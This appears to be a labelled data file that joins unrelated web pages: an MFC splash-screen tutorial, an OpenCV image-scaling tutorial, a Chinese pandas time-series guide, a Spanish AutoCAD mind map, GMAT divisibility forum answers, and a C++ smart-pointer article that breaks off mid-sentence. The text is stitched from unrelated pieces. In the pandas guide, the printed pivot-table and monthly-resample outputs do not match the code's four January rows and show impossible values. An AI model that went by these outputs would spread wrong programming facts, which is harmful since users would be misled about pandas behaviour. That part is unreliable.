NULL, NULL); ShowCursor(FALSE); //Hide the cursor m_bClose = false; Show(); return TRUE; } You use Show() to begin drawing. void CUltraSplashWnd::Show() { while (!m_bClose) { RedrawWindow(); } } As you can see, this loop forces a redraw of the window, so that the animation can display. The animation implements in OnPaint(). You must create a memory DC to store the splash bitmap. After that, you check the animation style and jump to the corresponding drawing function. void CUltraSplashWnd::OnPaint() { CPaintDC dc(this); // device context for painting m_pDC = &dc; //TODO: Add your message handler code here if(!m_MemDC.GetSafeHdc()) { m_MemDC.CreateCompatibleDC(&dc); //Create the memory DC to //store the bitmap m_MemDC.SelectObject(&m_bitmap); //Select the bitmap to //the DC } bool bOver = false; switch (m_nStyle) { case USS_LEFT2RIGHT: //left to right bOver = Left2Right(m_CtrlVal1); break; case USS_RIGHT2LEFT: //right to left bOver = Right2Left(m_CtrlVal1); break; case USS_UP2DOWN: //up to down bOver = Up2Down(m_CtrlVal1); break; case USS_DOWN2UP: //down to up bOver = Down2Up(m_CtrlVal1); break; case USS_HORISHUTTER: //horizontal shutter bOver = HoriShutter(m_CtrlVal1,m_CtrlVal2); break; case USS_VERTSHUTTER: //vertical shutter bOver = VertShutter(m_CtrlVal1,m_CtrlVal2); break; case USS_RANDOMBOX: //random box bOver = RandomBox(m_CtrlVal3); break; default: //Static drawing, copy picture to dc directly m_pDC->BitBlt(0, 0, m_bm.bmWidth, m_bm.bmHeight, &m_MemDC, 0, 0, SRCCOPY); break; } //set style to static after animated if (bOver) m_nStyle = USS_STATIC; // Do not call CWnd::OnPaint() for painting messages } For example: If you render the splash bitmap left to right, you use the function as follows: Animated Multithread Splash The render process is controlled by some member variables. The drawing functions use a reference to these control variables. Each calls the drawing function adds the control variable to 1, so it draws one column of the bitmap each time. When drawing to the right side, the function returns true and the style is set to static. bool CUltraSplashWnd::Left2Right(int &i) { if (i<m_bm.bmWidth) { m_pDC->BitBlt(i, 0, 1, m_bm.bmHeight, &m_MemDC, i, 0, SRCCOPY); i++; Sleep(1); return false; } else return true; } I just wrote seven drawing styles, it's easy to add your own drawing algorithm into the class. But, don't forget to initialize your control variables in SetStyle() and set the STYLE_COUNT to the styles' count. How to Use First of all, you can download the source files and add them into your app, which includes: • UltraSplash.cpp, UltraSplash.h • UltraSplashThread.cpp, UltraSplashThread.h • UltraSplashWnd.cpp, UltraSplashWnd.h Now, you must include one header into your project; in general, you can paste the following code to your Application Class that derived from CWinApp: //insert the header into your project #include "UltraSplash.h" Then, insert the following codes before the slow loading: CUltraSplash splash; splash.ShowSplash(IDB_BITMAP1, USS_RANDOM); IDB_BITMAP1 is the ID of the bitmap resource. You can change IDB_BITMAP1 to any picture you like. Also, you can use a picture filename as the first parameter. The second parameter is an animation-style enumeration; you can find the enumeration at the top of the UltraSplashWnd.h file. After the busy loading, you can hide the splash by using splash.HideSplash(). • If your application is modal dialog-based, you would like to release the splash object by using splash.Destory(); before the call of DoModal(). • If your application is another type, you would like to do nothing and the splash class can release itself in the destructor. You must note that the call of HideSplash() just hides the splash window rather than destroys it. And, the call of marco Destory() not only releases the splash thread but also implicitly sets the focus to the main window. So, if you you don't want to call the Destroy(), add this line: m_pMainWnd->SetForegroundWindow(); to set the focus to the main window, and the splash object will released in the destructor. After that, you can press F5 to see the result. Note: To active the main window (the default is that the main window is set to the bottom of the z-order), I divide the hiding and destroying into two parts, HideSplash just hides the splash window; the Destroy method implicitly calls the DestroySplash(m_pMainhWnd). Before closing the splash screen, you set the Main window to the top. Maybe there is a better method to solve this problem. In the end, as I said, I am a beginner and this my first article with CodeGuru. So, if you spot something that is incorrect in this code or you have any questions, please let me know by e-mailing me at: [email protected]. About the Author zheng chen My name is ChenZheng. Now I am undergraduate student studying at Univ of Elec Sci & Tech of China. I am interested in PR, CG, VR and DB. If you are interested in some of them, maybe you can contact me freely with [email protected] or [email protected]. Downloads Comments • There are no comments yet. Be the first to comment! Leave a Comment • Your email address will not be published. All fields are required. Top White Papers and Webcasts • On-demand Event Event Date: August 27, 2015 With the cloud enabling companies to spin up servers and stand up data stores more quickly, mobile apps can be created faster, reducing the time-to-value. But three major obstacles stand in the way for many organizations: The backlog of app project requests confronting every enterprise regardless of their internal app development capabilities Finding and employing better, faster tools to speed and simplify the process of developing those apps. The emergence of … • U.S. companies are desperately trying to recruit and hire skilled software engineers and developers, but there is simply not enough quality talent to go around. Tiempo Development is a nearshore software development company. Our headquarters are in AZ, but we are a pioneer and leader in outsourcing to Mexico, based on our three software development centers there. We have a proven process and we are experts at providing our customers with powerful solutions. We transform ideas into reality. Most Popular Programming Stories More for Developers RSS Feeds Thanks for your registration, follow us on our social networks to keep up-to-date
__label__pos
0.53651
                 How to Scale an Image Up or Down in Python using OpenCV Python In this article, we show how to scale an image up or down in Python using the OpenCV module. OpenCV is very dynamic in which we can take an image and perform different functions on the image, including scaling the image up or down. Scaling an image up means doubling its size, or giving the image twice as many pixels as the original. Scaling an image down means decreasing its size in half, or giving the image half as many pixels as the original. Sometimes this is referred to as pyramiding an image up or down. We scale an image up in Python using OpenCV with the cv2.pyrUp() function. We scale an image down in Python using OpenCV with the cv2.pyrDown() function. Realize that scaling an original image up normally leads to loss of quality as the dimensions are greater than the original image. Therefore, scaling an image down (such as to create a thumbnail of an image) is more than likely more common. So in this program, we are going to work with the following original image below. So above is an image of a rainforest. It is 800px (width) x 600px (height). After scaling the image down, we get the following image below. Image with scaling down in Python using OpenCV If we scale the image down once more, we get the following image below. Image with second scaling down in Python using OpenCV If we scale the original image up, we get the following image below. Image with scaling up in Python using OpenCV So let's now go to the code to see how this is done. Let's now go over this code. First, we import OpenCV using the line, import cv2, along with numpy and matplotlib. Next, we read in the original image, which in this case is, Rainforest-trees.png We show the image and then print out the size of the image. These are the original dimensions of the image. We then create a variable, scaled_down, which stores the scaled down image of the original image using the cv2.pyrDown() function. We then show the scaled down image. We then create another variable, scaled_down2, which stores the image scaled down further again. We pass the scaled_down variable and scale it down again. Therefore, the original image has now been scaled down twice. We then show the further scaled down image and output the size of the image. We then scale the original image up. We create a variable, scaled_up, which stores the image scaled up using the cv2.pyrUp() function. We then show this scaled up image and output the size of this scaled up image. If you wanted to scale this image up again, you could do so by passing in the scaled_up variable into the cv2.pyrUp(), another time. This would double the pixels again, width and height. We don't do in this case simply because the computer screen (that I have) isn't big enough to show the image if we double it again without cutting parts of it out. Once we run this code, we get the following output shown below. And this is how we can scale images up or down in Python using the OpenCV module to resize images by doubling them or halving them. Related Resources How to Draw a Rectangle in Python using OpenCV How to Draw a Circle in Python using OpenCV How to Draw a Line in Python using OpenCV How to Add Text to an Image in Python using OpenCV How to Display an OpenCV image in Python with Matplotlib How to Use Callback functions to Connect Images to Events in Python using OpenCV How to Check for Multiple Events in Python using OpenCV HTML Comment Box is loading comments... 
__label__pos
0.785234
HERRAMIENTAS DE DISEÑO AutoCAD Jetzt loslegen. Gratis! oder registrieren mit Ihrer E-Mail-Adresse HERRAMIENTAS DE DISEÑO AutoCAD von Mind Map: HERRAMIENTAS DE DISEÑO AutoCAD 1. Inicio en la interfaz AutoCAD 1.1. Enlaces rápidos 1.1.1. Iniciar dibujo 1.1.2. Abrir archivo 1.1.3. Abrir conjunto de planos 1.1.4. Obtener más plantillas en linea 1.1.5. Examinar Dibujos de ejemplo 1.1.6. Documentos recientes 1.1.7. Notificaciones 1.1.7.1. Rendimientos 1.1.7.2. - Iniciar sesión en A360 1.1.7.3. Enviar comentarios. 2. INICIO DEL PROGRAMA 2.1. Se da doble Clic en el Icono del programa 3. Interfaz de Autocad 3.1. Ventana de la aplicación 3.1.1. Permite tener varios archivos abiertos al mismo tiempo 3.2. Home (Inicio) 3.2.1. Contiene los comando de uso más frecuente dentro del programa 3.2.1.1. Objetos básicos 3.2.1.2. Herramientas de dibujo 3.2.1.3. Herramientas de modificación 3.2.1.4. Capas 3.2.1.5. Anotaciones básicas 3.3. Ventana de dibujo 3.3.1. permite 3.3.1.1. Minimizar 3.3.1.2. Maximizar 3.3.1.3. Cambiar de tamaño 3.3.1.4. Chequear el estado de cualquier documento en ventana 3.3.1.5. Cambiar la forma de presentar el dibujo, ventanas de observación y métodos de zoom. 3.4. Barra de herramientas (Toolbar) 3.4.1. contienen diferentes iconos, los cuales representan los comandos requeridos en el desarrollo del modelo para el aprendiz 3.5. Barra de estado 3.5.1. muestra 3.5.1.1. localización del cursor 3.5.1.2. Herramientas de dibujo 3.5.1.3. Herramientas que afectan el entorno del dibujo 3.5.2. Provee accesos rápido a 3.5.2.1. Model (modelo) 3.5.2.1.1. cambia la vista del dibujo de modelo en una ventana de presentación al espacio del papel. 3.5.2.2. Grid (rejilla) 3.5.2.2.1. muestra una cuadrícula en el área de dibujo. 3.5.2.3. Snap (forzcursor) 3.5.2.3.1. establece los desplazamientos del cursor en incrementos específicos. 3.5.2.4. Ortho (orto) 3.5.2.4.1. restringe a solo movimientos en direcciones horizontales o verticales 3.5.2.5. Polar (polar) 3.5.2.5.1. permite el rastreo polar, haciendo uso de ángulos polares específicos 3.5.2.6. Isodraft (dibujoiso): 3.5.2.6.1. Simula un entorno de dibujo isométrico alineando objetos a lo largo de ejes isométricos, donde el ángulo entre cada eje es de 120 °. 3.5.2.7. Autosnap (autosnap) 3.5.2.7.1. rastrea el cursor a lo largo de las trayectorias de alineación horizontal y vertical desde los puntos de referencia de objetos 3.5.2.8. Osnap (refent) 3.5.2.8.1. ajusta el cursor al punto de referencia 2D más cercano. 3.5.2.9. Show annotation objects (mostrar objetos anotativos) 3.5.2.9.1. muestra objetos anotativos usando la escala de anotación 3.5.2.10. Annotation scale (escala de anotación) 3.5.2.10.1. establece la escala de anotación actual para objetos anotativos en el espacio del modelo. 3.5.2.11. Vscurrent (estvisactual) 3.5.2.11.1. cambia el espacio de trabajo actual al seleccionado 3.5.2.12. Annomonitor (anotación del monitor) 3.5.2.12.1. enciende y apaga la anotación del monitor 3.5.2.13. Isolate objects (objetos aislados) 3.5.2.13.1. ocultar objetos seleccionados en el área de dibujo o mostrar objetos que estaban ocultos anteriormente 3.5.2.14. Graphics config (configuración gráfica) 3.5.2.14.1. muestra las opciones de rendimiento gráfico en la línea de comando 3.5.2.15. Clean screen (limpia pantallas) 3.5.2.15.1. maximiza el área de dibujo despejándola dela línea de opciones, las barras de herramientas y las ventanas acoplables, excepto la ventana de comandos 3.6. Ventana de comandos 3.6.1. acepta la introducción de comandos y variables desistema y muestra solicitudes que guían al usuario a través de la secuencia de comandos 4. Principales componentes 4.1. Barras de herramientas de acceso rápido 4.1.1. Home (inicio) 4.1.1.1. muestra los comandos principales para 4.1.1.1.1. dibujar. 4.1.1.1.2. Editar 4.1.1.1.3. Modificar y realizar anotaciones 4.1.1.1.4. capas 4.1.1.1.5. Bloques 4.1.1.1.6. Propiedades 4.1.1.1.7. Grupos 4.1.2. Insert (insertar) 4.1.2.1. presenta los comandos para 4.1.2.1.1. Insertar gráficos 4.1.2.1.2. imágenes 4.1.2.1.3. Crear y Editar imágenes 4.1.2.1.4. referencias 4.1.2.1.5. nubes 4.1.2.1.6. datos 4.1.2.1.7. ubicaciones 4.1.3. Annotate (anotar) 4.1.3.1. contiene los comandos para 4.1.3.1.1. escribir textos 4.1.3.1.2. Tomar dimensiones 4.1.4. Parametric (paramétrico): 4.1.4.1. muestra los comandos para ajustar las restricciones del dibujo como 4.1.4.1.1. perpendicular 4.1.4.1.2. horizontal 4.1.4.1.3. tangente 4.1.4.1.4. colineal 4.1.4.1.5. paralelo 4.1.4.1.6. También las características de las dimensiones 4.1.5. View (vista) 4.1.5.1. presenta los comandos para 4.1.5.1.1. manejo de las herramientas de las ventanas 4.1.5.1.2. modelos e interfaces 4.1.6. Manage (gestionar) 4.1.6.1. contiene los comandos para 4.1.6.1.1. procesos de grabacion 4.1.6.1.2. perzonalizacion 4.1.6.1.3. aplicaicones 4.1.7. Output (salida) 4.1.7.1. muestra los comandos para la ejecución de los procesos desalida e impresión 4.1.8. Add_ins (Add_ins) 4.1.8.1. presenta los comandos para la gestión de las referencias cruzadas almacenadas 4.1.9. A360 4.1.9.1. contiene los comandos para 4.1.9.1.1. manejo de archivos compartidos en la nube 4.1.9.1.2. sincronizar los cambios 4.1.9.1.3. manejo de los proyectos 4.1.10. Express Tools (express tools) 4.1.10.1. muestra los comandos para manejo de herramientas que no son instaladas por defecto y que es necesario cargarlas. 4.1.11. Featured Tools (herramientas destacadas) 4.1.11.1. presenta el comando para tener acceso directo a aplicaciones y contenido que pueda ser descargado 4.1.12. BIM 360 4.1.12.1. contiene los comandos para 4.1.12.1.1. facilitar el uso de modelos compartidos 4.1.12.1.2. verificación de errores 4.1.13. Performance (Performance) 4.1.13.1. muestra los comandos para 4.1.13.1.1. verificación 4.1.13.1.2. reportes de rendimiento 4.2. Ventanas y cuadros de diálogo 4.2.1. Ventana de línea de comandos 4.2.2. Menú contextual 4.2.3. Captura dinámica de parámetros 4.3. Herramienta mouse 4.3.1. Botón izquierdo 4.3.1.1. Selección de entidades 4.3.1.2. Selección de iconos 4.3.1.3. Selección de herramientas del Tools Paletts 4.3.1.4. Selección de las opciones del menú 4.3.1.5. Ingreso de puntos 4.3.2. Botón derecho 4.3.2.1. Activar los menús contextuales 4.3.3. Scroll 4.3.3.1. Ampliar o disminuir el dibujo 4.3.3.2. Desplazar el dibujo 4.4. Métodos para acceder a los comandos y a las herramientas 4.4.1. herramientas para generar diseños 4.4.1.1. F1: Menús y rutinas de ayuda. 4.4.1.2. F2: Abre la ventana de texto 4.4.1.3. F3: Cambia el estado de osnap entre ON y OFF 4.4.1.4. F4: Cambia el estado del tablero para toma de datos. 4.4.1.5. F5: Cambia el plano de referencia. 4.4.1.6. F6: Modifica el estado del sistema de coordenadas. 4.4.1.7. F7: Pone o quita la grilla de referencia. 4.4.1.8. F8: Entra o sale del modo ortogonal. 4.4.1.9. F9: Pone el modo snap a ON uOFF. 4.4.1.10. F10: Entra o sale del modo de coordenadas polares. 4.5. Cómo personalizar la interfaz 4.5.1. Se puede modificar el aspecto de la interfaz al dar clic en el botón de inicio y seleccionar el comando Options (opciones). 4.6. Unidades a utilizar en el diseño 4.6.1. Las unidades de dibujo son las unidades de medida en AutoCAD, que pueden estar en milímetros, metros, kilómetros o pulgadas 5. Botón de inicio 5.1. Representa el icono del programa 5.2. funciones comunes para empezar proyectos 5.2.1. generación de un nuevo dibujo 5.2.2. abrir o guardar un proyecto 5.2.3. publicar 5.2.4. Exportar 5.2.5. Imrimir 6. Coordenadas del diseño 6.1. Coordenadas absolutas 6.1.1. Plano cartesiano compuesto por un eje horizontal llamado eje X o eje de las abscisas; y un eje vertical llamado eje Y o eje de las ordenadas. 6.2. Coordenadas relativas 6.2.1. Se refieren al último punto introducido y no al origen de coordenadas. Su formato es @X,Y (p.ej. @22,160). Lo que se le indica al programa es un desplazamiento o incremento en X y en Y respecto al punto anteriormente utilizado. 6.3. Coordenadas polares 6.3.1. Se refieren también al último punto utilizado, pero indica una distancia y un ángulo. El formato es @distancia<ángulo (p.ej. @12<45)
__label__pos
0.999976
Pandas.DataFrame时间序列数据处理的实现 • Post category:Python Pandas是一个强大的数据处理框架,它提供了多种方便的方法来处理时间序列数据。下面是完整的“Pandas.DataFrame时间序列数据处理的实现”的攻略。 1. 时间序列的特性 时间序列数据有以下特点: • 数据是按照时间顺序排列的。 • 数据通常是等间隔的。 因此,要处理时间序列数据,需要对其进行特殊处理。 2. 表示时间序列数据 时间序列数据通常在Pandas中表示为DataFrame,其中包含至少一个时间列和用于表示数据的其他列。时间列必须是Pandas中的时间序列对象(例如DatetimeIndex或PeriodIndex)。这些对象可以通过Pandas的to_datetime方法从字符串或数字数据中创建。 下面是一个示例,说明如何创建Pandas时间序列对象: import pandas as pd # 创建时间序列数据 data = {'date': ['2021-01-01', '2021-01-02', '2021-01-03', '2021-01-04'], 'value': [1, 2, 3, 4]} df = pd.DataFrame(data) # 将字符串类型转换为时间序列类型 df['date'] = pd.to_datetime(df['date']) # 将时间序列作为索引 df = df.set_index('date') print(df) 输出结果为: value date 2021-01-01 1 2021-01-02 2 2021-01-03 3 2021-01-04 4 3. 时间序列数据的基本操作 Pandas提供了丰富的数据操作方法,可以方便地处理时间序列数据。下面是一些示例: 3.1 选择时间段 可以使用loc方法选择时间段,例如选择所有2021年的数据: df.loc['2021'] 3.2 选择时间序列中的最大值和最小值 可以使用idxmax和idxmin方法选择时间序列中的最大值和最小值: print(df['value'].idxmax()) print(df['value'].idxmin()) 3.3 计算滚动平均值 可以使用rolling方法计算时间序列的滚动平均值: df['rolling_mean'] = df['value'].rolling(2).mean() print(df) 输出结果为: value rolling_mean date 2021-01-01 1 NaN 2021-01-02 2 1.5 2021-01-03 3 2.5 2021-01-04 4 3.5 4. 时间序列数据的高级操作 Pandas还提供了更高级的方法,可以处理包含多个时间序列的数据集,例如数据透视表和时间序列重采样。 4.1 数据透视表 可以使用Pandas的pivot_table方法创建数据透视表,例如可以按照年份和月份对数据进行分组: df_pivot = pd.pivot_table(df, values='value', index=df.index.year, columns=df.index.month) print(df_pivot) 输出结果为: date 1 2 3 4 date 2021 2 2 3 4 4.2 时间序列重采样 可以使用Pandas的resample方法将时间序列重采样为不同的频率。例如将数据按月重新采样: df_monthly = df.resample('M').sum() print(df_monthly) 输出结果为: value date 2021-01-31 6 2021-02-28 0 2021-03-31 0 2021-04-30 4 5. 总结 本文介绍了Pandas中处理时间序列数据的方法,包括表示时间序列数据、基本操作和高级操作。代码示例中演示了如何创建时间序列对象、选择时间段、计算滚动平均值、创建数据透视表和重新采样时间序列。
__label__pos
0.717867
Lesson: Introduction to Divisibility Comment on Introduction to Divisibility Whoa! Ok, I'm going to need a little more clarification here than most, if you don't mind. N = 10^40 + 2^40. 2^k is a divisor of N, but 2^(k+1) is not a divisor of N. If k is a positive integer, what is the value of k−2? Thanks gmat-admin's picture Happy to help, bertyy! You're referring to my question here: https://gmatclub.com/forum/n-10-40-2-40-2-k-is-a-divisor-of-n-237383.html This is a VERY tricky question (750+) I have a step-by-step solution here: https://gmatclub.com/forum/n-10-40-2-40-2-k-is-a-divisor-of-n-237383.htm... Rather than repeat the entire solution, can you take a look and tell me which parts you'd like me to cllarify? Hi Brent, Factoring the first part is not the problem or seeing that "5" to the power of anything ends in five. The rest after that just throws me for a loop as to what to do or what is even going on. Usually I can force it after a while and come back to it, but this one has got me blocked. I can't figure out what i'm missing or that some concept that has escaped me. Thanks for your help gmat-admin's picture Okay, I'll elaborate on my solution at https://gmatclub.com/forum/n-10-40-2-40-2-k-is-a-divisor-of-n-237383.htm... WE have : N = 2^40(5^40 + 1) We know that 5^40 must end in 25. So, we can say 5^40 = XXXX25 (the X's represent other digits on the number, but we don't really care about them. So, we can say: N = = 2^40(XXXX25 + 1) XXXX25 + 1 = XXXXX26 (if we add 1 to a number that ends in 25, the resulting value will end in 26 So, N = (2^40)(XXXX26) At this part, we need to recognize that since XXX26 is EVEN. So, we can rewrite XXX26 as (2)(XXXX3). So, N = (2^40)[(2)(XXXX3)] We can now combine 2^40 and 2. We have: (2^40)(2) = (2^40)(2^1) = 2^41 So, N = (2^41)[XXXX3] Since XXXX3 is an ODD number, we cannot factor any more 2's out of it. In other words, since XXXX3 is ODD, there are no 2's hiding in the prime factorization of XXXX3. However, we DO know that there are 41 2's hiding in the prime factorization of 2^41. This means that 2^41 IS a factor of N, but 2^42 is NOT a factor of N. The question tells us that 2^k is a factor of N, but 2^(k+1) is NOT a factor of N In other words, k = 41 What is the value of k-2? Since k = 41, we can conclude that k - 2 = 41 - 2 = 39 Does that help? Cheers, Brent Hi Brent, what does this factorial expression mean 13!/7!.... Thanks Fatima-Zahra gmat-admin's picture Good question, Fatima-Zahra This concept appears later, in the counting module (here's the video that covers this notation: https://www.gmatprepnow.com/module/gmat-counting/video/780 ) In general, n! = (1)(2)(3)(4).....(n-1)(n) For example: 4! = (1)(2)(3)(4) = 24 And 7! = (1)(2)(3)(4)(5)(6)(7) = 5040 Cheers, Brent Hi Brent, I am referring to question https://gmatclub.com/forum/for-any-positive-integer-x-the-2-height-of-x-is-defined-to-be-the-207706.html I cannot wrap my mind around terminology here "2-height of x", English is not my native language, so when I read "2-height of x", I am thinking of height as in "height of a person", is it a special math terminology "2-height of a number", or we are getting that 2-height is a number of 2s in a positive integer x, because we are given that it is defined such that x=2^n. In other words, can we have something like 3-height of an integer, 7-height of an integer? I see such terminology for the first time... Thanks a bunch! gmat-admin's picture Question link: https://gmatclub.com/forum/for-any-positive-integer-x-the-2-height-of-x-... The term "2-height" is something the test-makers made up to create this question. We can think of this question as a Strange Operator question, since we're presented with a new term and a definition of that term (more here: https://www.gmatprepnow.com/module/gmat-algebra-and-equation-solving/vid...) GIVEN: For any positive integer x, the 2-height of x is defined to be the greatest non-negative integer n such that 2^n is a factor of x. Example: If x = 24, what is the 2-height of 24? According to the definition, the 2-height of 24 is the biggest value of n, so that 2^n is a factor of 24. 24 = (2)(2)(2)(3) We can see that 2¹ is a factor of 24. Also, 2² is a factor of 24. And 2³ is a factor of 24. However, 2⁴ is NOT a factor of 24 So, the 2-height of 24 is 3 since 3 is the biggest possible power of 2 that is a factor of 24 Does that help? Cheers, Brent https://gmatclub.com/forum/is-positive-integer-z-greater-than-205456.html Or it could be the case that z = (3)(7)(13)(2) = 546,....... i could not understand this part (2); how can you multiply 2? gmat-admin's picture Link to question and my solution: https://gmatclub.com/forum/is-positive-integer-z-greater-than-205456.htm... If we know that z is a multiple of 21, then we know that 21 is hiding in the prime factorization of z. That is, we know that z = (3)(7)(?)(?)(?)(?) IMPORTANT: The ?'s represent other possible values that might be in the prime factorization of z. For example, it could be the case that z = (3)(7)(2)(11)(53) Or, it could be the case that z = (3)(7)(5)(5) Etc. That said, all we can be CERTAIN of is that there's a 3 and a 7 hiding in the prime factorization of z Likewise, if we know that z is a multiple of 39, then we know that 39 is hiding in the prime factorization of z. That is, we know that z = (3)(13)(?)(?)(?)(?) When we COMBINE the statements, we know that z MUST have (at the very least) a 3, a 7 and a 13 in its prime factorization. So, it COULD be the case that z = (3)(7)(13) Or it COULD be the case that z = (3)(7)(13)(2) Or it COULD be the case that z = (3)(7)(13)(11)(2)(5)...etc. Notice that, if z = (3)(7)(13)(2), then it's still divisible by 21, AND it's still divisible by 13 So, z = (3)(7)(13)(2) also satisfies both statements. Likewise, if z = (3)(7)(13)(11)(2)(5), then it's still divisible by 21, AND it's still divisible by 13 So, z = z = (3)(7)(13)(11)(2)(5) also satisfies both statements. etc. Does that help? Cheers, Brent Thanks a ton sir https://gmatclub.com/forum/n-10-40-2-40-2-k-is-a-divisor-of-n-237383.html most time i rely on your explanations as maximum are easy to understand. but this one is little bit tough to digest................. IMPORTANT: we need to recognize that 5^b will end in 25 for all integer values of b greater than 1. For example, 5^2 = 25 5^3 = 125 5^4 = 625 5^5 = 3125 5^6 = XXX25etc....( is it a kind of concept that 5^(any power,last digits will be 5)? secondly, = 2^40[2(XXXX3)] [Since XXX26 is EVEN, we can factor out a 2] = 2^41[XXXX3] ; how you make 2^41 ? ..thanks in advance gmat-admin's picture Question link: https://gmatclub.com/forum/n-10-40-2-40-2-k-is-a-divisor-of-n-237383.html KEY CONCEPT: A x (B x C) = (A x B) x C For example, 3 x (2 x 5) = (3 x 2) x 5 Now, let's keep going from the part when I say that: N = 2^40[2(some number ending in 3)] Take: N = 2^40[2(some number ending in 3)] Use key concept to rewrite this as: N = (2^40 x 2)(some number ending in 3) Rewrite 2 as 2^1 to get: N = (2^40 x 2^1)(some number ending in 3) Simplify to get: N = (2^41)(some number ending in 3) Does that help? Cheers, Brent Hi Brent, I have one question from GMAT Official Guide 2019, question 298 statement one, why c = f, and a = b = 1? Thanks x gmat-admin's picture Question link: https://gmatclub.com/forum/each-entry-in-the-multiplication-table-above-... This official solution doesn't say that it MUST be the case a = b = 1. It just note that this COULD be the case. That is, if c = f, then it COULD be the case that c = f = 2 and a = b = 1. In this case, the answer to the target question is "c = 2." However, it could also be the case that c = f = 3 and a = b = 1. In this case, the answer to the target question is "c = 3." Does that help? Cheers, Brent Hi Brent, I have one question from the Official Guide 2019, page 165 question 127, in the answer explanation, I don´t get it why "if n were divisible by 15, then n-20! would be divisible by 15"? Thank you in advance x gmat-admin's picture There's a nice divisibility property that says: If J is divisible by n, and K is divisible by n, then J-K must also be divisible by n. Since 20! = (20)(19)(18)(17)(16)(15)(14)(13)....(2)(1), we can see that 20! is divisible by 15. So, if n is divisible by 15 then, according to the above property, n - 20! must also be divisible by 15. For more on this divisible property watch: https://www.gmatprepnow.com/module/gmat-integer-properties/video/831 Hi Brent, If n and k are positive integers, is n divisible by 6 ? (1) n = k(k + 1)(k – 1) (2) k – 1 is a multiple of 3. In the statement (1) do I have to worry about k=1, in which case the whole expression k(k + 1)(k – 1)=0, Do I have to understand that 0 when divided by any existing number except 0 with no remainder, which implies that 0 is divisible by any number? Thank you in advance, gmat-admin's picture You're correct to say that zero is divisible by any integer. For example we can say that 0 is divisible by 3. That said, when it comes to divisibility questions, the GMAT usually (probably ALWAYS) restricts values to POSITIVE integers. Cheers, Brent Thank you very much Brent, I understand now Is 12 a factor of the positive integer n? (1) n is a factor of 36. (2) 3 is a factor of n. Can i *rephrase* the question like this? Is n Divided by 12? 1/ 36 divided by n 2/ n divided by 3 If yes, should i follow this technique in exam?? Wouldn’t it kill time? Thanks in advance Sir. https://gmatclub.com/forum/is-12-a-factor-of-the-positive-integer-n-253113.html gmat-admin's picture Question link: https://gmatclub.com/forum/is-12-a-factor-of-the-positive-integer-n-2531... I think you mean to use the word DIVISIBLE, as in "36 DIVISIBLE n" In that case it would be perfectly fine to rephrase everything as: Is n DIVISIBLE by 12? (1) 36 is DIVISIBLE by n (2) n is DIVISIBLE by 3 It's hard to determine which technique is best for you, since different people will feel differently about the easiest way to rephrase the information. Some people prefer "n is a factor of 36" and some prefer "36 is DIVISIBLE by n" Cheers, Brent Is x/y an even integer? (1) x is even. (2) y is a factor of x. My explanation: 1/we Don't know about y 2/ after rephrasing x/y; don't know about y. After combining 1+2.. Still we DON'T know about x & y. Rather it' E .... is it a correct explanation? gmat-admin's picture I'm a little unclear of what you mean be "after rephrasing x/y; don't know about y." Can you elaborate? Also, for statement 1, we need to be careful. Not knowing anything about y won't always make the statement insufficient. For example, if the question were.... If x and y are INTEGERS, is x/y an even integer? (1) x is ODD. ...then statement 1 would be sufficient (even if we don't know anything about y) The reason for this is that, if x is ODD, then x/y can never be even. Cheers, Brent As we saw a line in the last part of the video X is divisible by y= y is a factor of x So, in statement (2) i rephrase it in x/y. Is it wrong sir? & what's the legal approach in statement (1) then as i said we dontknow about y Thanks gmat-admin's picture You're absolutely right to say that "x is divisible by y" is the same as saying "y is a factor of x" If I understand you correctly, you're also saying that statement 2 can be rephrased as saying "x/y is an integer." This is also correct. As I mentioned, not knowing anything about y might not always be grounds for concluding a statement is not sufficient. So, to show that statement 1 is not sufficient, I would look for some counterexamples that yielded different answers to the target question. For example: Target question: Is x/y even? (1) x is even CASE I: x = 12 and y = 3. In this case, x/y = 12/3 = 4, and 4 is even. So, the answer to the target question is "YES, x/y is even" CASE II: x = 12 and y = 4. In this case, x/y = 12/4 = 3, and 3 is not even. So, the answer to the target question is "NO, x/y is not even" By examining these two possible cases, it is clear that statement 1 is not sufficient. Does that help? Add a comment Tweet about the course! If you're enjoying my video course, help spread the word on Twitter. Change Playback Speed You have the option of watching the videos at various speeds (25% faster, 50% faster, etc). To change the playback speed, click the settings icon on the right side of the video status bar. Have a question about this video? Post your question in the Comment section below, and I’ll answer it as fast as humanly possible. Free “Question of the Day” emails!
__label__pos
0.951373
Click here to Skip to main content 13,141,576 members (51,658 online) Click here to Skip to main content Add your own alternative version Stats 24.5K views 52 bookmarked Posted 19 Feb 2013 Smart Pointers Gotchas , 27 Aug 2014 Rate this: Please Sign up or sign in to vote. Several issues related to smart pointers that are worth knowing. Introduction There are several questions about using smart pointers in modern C++: • Why is auto_ptr deprecated? • Why unique_ptr finally works good? • How to use arrays with unique_ptr? • Why create shared_ptr with make_shared? • How to use arrays with shared_ptr? • How to pass smart pointers to functions? • How to cast smart pointers? While learning how to use new C++ standard, I came across several issues with smart pointers. In general, you can mess a lot less using those helper objects. It is advised to use them instead of raw pointers as often as possible. Unfortunately, there are some topics you have to understand to take full advantage of them. As in most cases you get a new tool to solve your problems, but on the other hand this tool introduces other problems as well. Some Predefines Let us take a simple Test class with one member to present further concepts: class Test { public: Test():m_value(0) { std::cout << "Test::Test" << std::endl; } ~Test() { std::cout << "Test::~Test destructor" << std::endl; } int m_value; }; typedef std::auto_ptr<Test> TestAutoPtr; typedef std::unique_ptr<Test> TestUniquePtr; typedef std::shared_ptr<Test> TestSharedPtr; Why auto_ptr is Deprecated? auto_ptr was one of the first types of smart pointers introduced in C++ (in C++98 to be more precise). It was designed to serve as a simple unique pointer (only one owner, without any reference counter), but people tried to use it also in a form of shared pointer. None of those functionalities were satisfied by auto_ptr's implementation! Quick example below: void doSomethig(TestAutoPtr myPtr) { myPtr->m_value = 11; } void AutoPtrTest() { TestAutoPtr myTest(new Test()); doSomethig(myTest); myTest->m_value = 10; } Try to compile and run this... what happens? It crashes just after we leave doSomething procedure! We would assume than in doSomething some reference counter for our pointer is incremented, but auto_ptr has no such thing. The object is destroyed because when we leave doSomething procedure our pointer gets out of scope and is deleted. To make it work, we could pass a reference to auto pointer. Another thing is that we have limited way of deleting more complicated objects, there is no control over it at all, only delete can be used here. Why unique_ptr Finally Works Good? Fortunately with the new standard, we got a brand new set of smart pointers! When we change auto_ptr to std::unique_ptr<Test> in our previous example, we will get compile (not runtime) error saying that we cannot pass pointer to other function. This is the proper behaviour. unique_ptr is correctly implemented because of move semantics basically. We can move (but not copy) ownership from pointer to another. We also need to be aware when and where we pass the 